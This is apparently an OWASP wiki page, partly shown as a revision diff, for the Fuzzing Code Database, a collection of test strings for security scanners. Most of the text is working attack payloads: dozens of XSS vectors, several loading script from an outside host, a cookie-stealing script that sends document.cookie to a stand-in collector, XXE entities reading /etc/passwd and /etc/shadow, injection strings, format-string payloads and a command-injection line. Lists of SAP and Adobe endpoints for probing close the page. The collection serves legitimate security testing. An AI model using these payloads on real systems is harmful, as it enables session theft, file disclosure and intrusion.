&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;
 +
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"
 +
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"
 +
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"
 +
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"
 +
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"
 +
¼script¾alert(¢XSS¢)¼/script¾
 +
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"
 +
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"
 +
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"
 +
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"
 +
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"
 +
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"
 +
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"
 +
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"
 +
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"
 +
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"
 +
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"
 +
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"
 +
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"
 +
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"
 +
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"
 +
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"
 +
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"
 +
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"
 +
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;
 +
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"
 +
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"
 +
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;
 +
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
 +
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"
 +
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
 +
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
 +
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"
 +
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
 +
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"
 +
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"
 +
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"
 +
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"
 +
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"
 +
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"
 +
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""h\ntt\tp://6"
 +
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"
 +
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"
 +
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&amp;{document.write(""XSS-XSS-XSS"");};"
 +
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"
 +
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"
 +
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"
 +
"&lt;div style=""behaviour: url([link to code]);""&gt;"
 +
"&lt;div style=""binding: url([link to code]);""&gt;"
 +
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"
 +
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"
 +
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
 +
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"
 +
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
 +
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"
 +
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"
 +
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"
 +
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"
 +
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"
 +
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"
 +
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"
 +
&gt;&lt;script&gt;
 +
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"
 +
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"
 +
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 +
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;
 +
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;
 +
"%3cscript%3ealert(""WXSS"");%3c/script%3e"
 +
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
 +
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
 +
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;
 +
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert
 +
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;
 +
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;
 +
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"
 +
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""
 +
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;
 +
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;
 +
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"
 +
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"
 +
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;
 +
&lt;IMG%20SRC='javasc
 +
"&lt;IMG%20SRC=""jav"
 +
"&lt;IMG%20SRC=""jav    ascript:alert('WXSS');""&gt;"
 +
"&lt;IMG%20SRC=""jav
 +
ascript:alert('WXSS');""&gt;"
 +
"&lt;IMG%20SRC=""jav
 +
ascript:alert('WXSS');""&gt;"
 +
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"
 +
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"
 +
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"
 +
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;
 +
&lt;IMG%20SRC=javascript:alert('XSS')&gt;
 +
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;
 +
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;
 +
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
 +
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;
 +
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
 +
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}
 +
'';!--&lt;XSS&gt;=&amp;{()}"
 +
</pre>
 +
<br>
  
 +
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===
 +
<pre>Statements
 +
count(/child::node())
 +
x' or name()='username' or 'x'='y
 +
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;
 +
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;
 +
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/shadow""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
 +
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////dev/random""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"
 +
"&lt;xml ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;"
 +
"&lt;xml ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
 +
"&lt;xml SRC=""xsstest.xml"" ID=I&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"
 +
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"
 +
</pre>
 +
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===
 
<pre>
 
<pre>
 +
# Full List
 +
# Format String tests to determine errors in variable handling
 +
# Florian Roth @4nc4p
  
 
%s%p%x%d
 
%s%p%x%d
Line 228: Line 4,163:
 
%.16705u%2\$hn
 
%.16705u%2\$hn
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;
+
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &gt; /tmp/file; exit;
 +
</pre>
 +
==== Project Contributor  ====
 +
 
 +
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']]
 +
 
 +
Reviewer: [[:User:eneves|'''Eduardo Neves''']]
 +
 
 +
Contributor: [[:User:Ulisses_Castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']]
 +
 
 +
==== Feedback and Participation  ====
  
</pre>
+
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org
 +
 
 +
==== Project Identification  ====
 +
 
 +
{{Template:OWASP Project Identification Tab
 +
| project_name = OWASP Fuzzing Code Database
 +
| project_description =
 +
| leader_name = Wagner Elias
 +
| leader_email =
 +
| leader_username = Wagner.elias
 +
| maintainer_name =
 +
| maintainer_email =
 +
| maintainer_username =
 +
| contributor_name1 =
 +
| contributor_email1 =
 +
| contributor_username1 =
 +
| contributor_name2 =
 +
| contributor_email2 =
 +
| contributor_username2 =
 +
| contributor_name3 =
 +
| contributor_email3 =
 +
| contributor_username3 =
 +
| contributor_name4 =
 +
| contributor_email4 =
 +
| contributor_username4 =
 +
| contributor_name5 =
 +
| contributor_email5 =
 +
| contributor_username5 =
 +
| contributor_name6 =
 +
| contributor_email6 =
 +
| contributor_username6 =
 +
| contributor_name7 =
 +
| contributor_email7 =
 +
| contributor_username7 =
 +
| contributor_name8 =
 +
| contributor_email8 =
 +
| contributor_username8 =
 +
| contributor_name9 =
 +
| contributor_email9 =
 +
| contributor_username9 =
 +
| contributor_name10 =
 +
| contributor_email10 =
 +
| contributor_username10 = 
 +
| pamphlet_link =
 +
| mailing_list_name = owasp-fuzzing-code-database
 +
| links_url1 =
 +
| links_name1 =
 +
| links_url2 =
 +
| links_name2 =
 +
| links_url3 =
 +
| links_name3 =
 +
| links_url4 =
 +
| links_name4 =
 +
| links_url5 =
 +
| links_name5 =
 +
| links_url6 =
 +
| links_name6 =
 +
| links_url7 =
 +
| links_name7 =
 +
| links_url8 =
 +
| links_name8 =
 +
| links_url9 =
 +
| links_name9 =
 +
| links_url10 =
 +
| links_name10 =
 +
| project_road_map =
 +
| project_health_status =
 +
| current_release_name =
 +
| current_release_date =
 +
| current_release_download_link =
 +
| current_release_rating =
 +
| current_release_leader_name =
 +
| current_release_leader_email =
 +
| current_release_leader_username =
 +
| last_reviewed_release_name =
 +
| last_reviewed_release_date =
 +
| last_reviewed_release_download_link =
 +
| last_reviewed_release_rating =
 +
| last_reviewed_release_leader_name =
 +
| last_reviewed_release_leader_email =
 +
| last_reviewed_release_leader_username =
 +
| old_release_name1 =
 +
| old_release_date1 =
 +
| old_release_download_link1 =
 +
| old_release_name2 =
 +
| old_release_date2 =
 +
| old_release_download_link2 =
 +
| old_release_name3 =
 +
| old_release_date3 =
 +
| old_release_download_link3 =
 +
| old_release_name4 =
 +
| old_release_date4 =
 +
| old_release_download_link4 =
 +
| old_release_name5 =
 +
| old_release_date5 =
 +
| old_release_download_link5 =
 +
}} __NOTOC__ <headertabs />  
 +
 
 +
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]

Latest revision as of 11:37, 23 July 2015



OWASP Inactive Banner.jpg

This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab, WebSlayer and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

News

10 November 2011

  • Update Category: SAP Common URL Web Interfaces (10 November 2011 - Total Statements: 155)

08 November 2010

  • Created new Category: Adobe XML Files (08 November 2010 - Total Statements: 16)

15 September 2010

  • Created new Category: SAP Common URL Web Interfaces (15 September 2010 - Total Statements: 6)

17 March 2010

  • Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)
  • Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)
  • Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)
  • Created new Category: Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)
  • Created new Category: File Upload Filter Bypass (Update: 17 March 2010 - Total Statements: 4)
  • Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)
  • Created new Category: Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)
  • Created new Category: Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)
  • Created new Category: Commonly Writable directories File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 9)

16 March 2010

  • Created new Category: Common Data File Extensions (Update: 16 March 2010 - Total Statements: 863)
  • Created new Category: Uncommon Data File Extensions (Update: 16 March 2010 - Total Statements: 284)
  • Created new Category: Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)
  • Created new Category: All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2010 - Total Statements: 31)


02 February 2010

  • Created new Category Lotus/Notes Files

11 August 2009

  • Created new Category: XML Attacks

Update Statements

  • 15 new XML Statements
  • 93 new SQL Injections Statements
  • 67 new Traversal Directory Statements
  • Delete 33 XSS Statement Duplicate
  • 30 New XSS Statements

7 August 2009

  • Updated the objectives of the project.

21 July 2009

  • Set the team responsible for the project.

Goals

This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.

In addition, the following functionalities will be included on this project:

1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases

An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:

1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.

2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.

3 - Possibility to support users on the report of their own experiences with the statements.

Statements

Adobe XML Files (08 November 2010)

/flex2gateway/
/flex2gateway/http
/flex2gateway/httpsecure
/flex2gateway/cfamfpoolling
/flex2gateway/amf
/flex2gateway/amfpolling
/messagebroker/http
/messagebroker/httpsecure
/blazeds/messagebroker/http
/blazeds/messagebroker/httpsecure
/samples/messagebroker/http
/samples/messagebroker/httpsecure
/lcds/messagebroker/http
/lcds/messagebroker/httpsecure
/lcds-samples/messagebroker/http
/lcds-samples/messagebroker/httpsecure

SAP Commom URL Web Interface (10 November 2011)

/rep/build_info.html
/rep/build_info.jsp
/run/build_info.html
/run/build_info.jsp
/rwb/version.html
/sap/bc/bsp/esh_os_service/favicon.gif
/sap/bc/bsp/sap
/sap/bc/bsp/sap/alertinbox
/sap/bc/bsp/sap/bsp_dlc_frcmp
/sap/bc/bsp/sap/bsp_veri
/sap/bc/bsp/sap/bsp_verificatio
/sap/bc/bsp/sap/bsp_wd_base
/sap/bc/bsp/sap/bspwd_basics
/sap/bc/bsp/sap/certmap
/sap/bc/bsp/sap/certreq
/sap/bc/bsp/sap/crm_bsp_frame
/sap/bc/bsp/sap/crmcmp_bpident/
/sap/bc/bsp/sap/crmcmp_brfcase
/sap/bc/bsp/sap/crmcmp_hdr
/sap/bc/bsp/sap/crmcmp_hdr_std
/sap/bc/bsp/sap/crmcmp_ic_frame
/sap/bc/bsp/sap/crm_thtmlb_util
/sap/bc/bsp/sap/crm_ui_frame
/sap/bc/bsp/sap/crm_ui_start
/sap/bc/bsp/sap/esh_sap_link
/sap/bc/bsp/sap/esh_sapgui_exe
/sap/bc/bsp/sap/graph_bsp_test
/sap/bc/bsp/sap/graph_bsp_test/Mimes
/sap/bc/bsp/sap/gsbirp
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/iccmp_bp_cnfirm
/sap/bc/bsp/sap/iccmp_hdr_cntnr
/sap/bc/bsp/sap/iccmp_hdr_cntnt
/sap/bc/bsp/sap/iccmp_header
/sap/bc/bsp/sap/iccmp_ssc_ll/
/sap/bc/bsp/sap/ic_frw_notify
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/public/graphics
/sap/bc/bsp/sap/sam_demo
/sap/bc/bsp/sap/sam_notifying
/sap/bc/bsp/sap/sam_sess_queue
/sap/bc/bsp/sap/sbspext_htmlb
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/spi_admin
/sap/bc/bsp/sap/spi_monitor
/sap/bc/bsp/sap/sxms_alertrules
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/thtmlb_scripts
/sap/bc/bsp/sap/thtmlb_styles
/sap/bc/bsp/sap/uicmp_ltx
/sap/bc/bsp/sap/xmb_bsp_log
/sap/bc/contentserver
/sap/bc/echo
/sap/bc/error
/sap/bc/FormToRfc
/sap/bc/graphics/net
/sap/bc/gui/sap/its/CERTREQ
/sap/bc/gui/sap/its/designs
/sap/bc/gui/sap/its/webgui
/sap/bc/IDoc_XML
/sap/bc/ping
/sap/bc/report
/sap/bc/soap/ici
/sap/bc/soap/rfc
/sap/bc/srt/IDoc
/sap/bc/wdvd
/sap/bc/webdynpro/sap/apb_launchpad
/sap/bc/webdynpro/sap/apb_launchpad_nwbc
/sap/bc/webdynpro/sap/apb_lpd_light_start
/sap/bc/webdynpro/sap/apb_lpd_start_url
/sap/bc/webdynpro/sap/application_exit
/sap/bc/webdynpro/sap/appl_log_trc_viewer
/sap/bc/webdynpro/sap/appl_soap_management
/sap/bc/webdynpro/sap/ccmsbi_wast_extr_testenv
/sap/bc/webdynpro/sap/cnp_light_test
/sap/bc/webdynpro/sap/configure_application
/sap/bc/webdynpro/sap/configure_component
